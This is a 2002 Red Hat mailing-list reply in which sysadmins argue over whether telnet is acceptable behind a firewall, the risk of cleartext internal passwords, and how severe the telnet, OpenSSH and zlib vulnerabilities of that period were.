On Thu, 14 Mar 2002, David Talkington wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Rick Warner wrote:
>
> >> Leaving aside for a moment the fact that the Sun admin needs his/her
> >> head checked for having telnet open in the first place (it appears
> >> that the telnet buffer overflow from last summer was patched ... in
> >> _January_), you should probably try 'export TERM=vt100' before
> >> connecting and see if that helps.
> >>
> >> If, on the other hand, it is you that administers this Sun box, then
> >> *thwap* to you for not killing telnet ages ago.
>
> >Nothing wrong with telnet in a firewalled environment, unless you are
> >worried about your users.
>
> I'll sidestep a lengthy discussion of best practices, but that isn't
> true. If you pass cleartext internally, any breach results in
> ownership of all your passwords.
Again there are multiple issues: can you trust your internal users, how
immune is your internal structure to 'sniffing', etc. And 'any breach'
does not necessarily compromise all passwords; one must assume the
possibility, but it is not necessarily true.
> I'm not sure I'd equate a 4-month-old remotely exploitable buffer
> overflow with a locally-exploitable vulnerability (*) that was
> patched in hours. But that's just my opinion.
Go back and read the reports. The alerts specifically state that there
were no known remote exploits but the possibility could not be ruled
out. Therefore, a 'best practice' assumption is that a remote exploit is
possible albeit unkown. A wise security admin would assume it is
probable.
> As for zlib, not only is its effect on sshd incidental, but its
> potential ramifications extend to a dizzying array of software on both
> Unix and Win32, so I'm not sure that's relevant in this case
The fact that there are over 500 applications known to be vulnerable due
to this bug is irrelevant to this discussion. What is relevant is that
OpenSSH is vulnerable due to its dependence on zlib. Not incidental,
critical.
- rick
_______________________________________________
Redhat-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/redhat-list
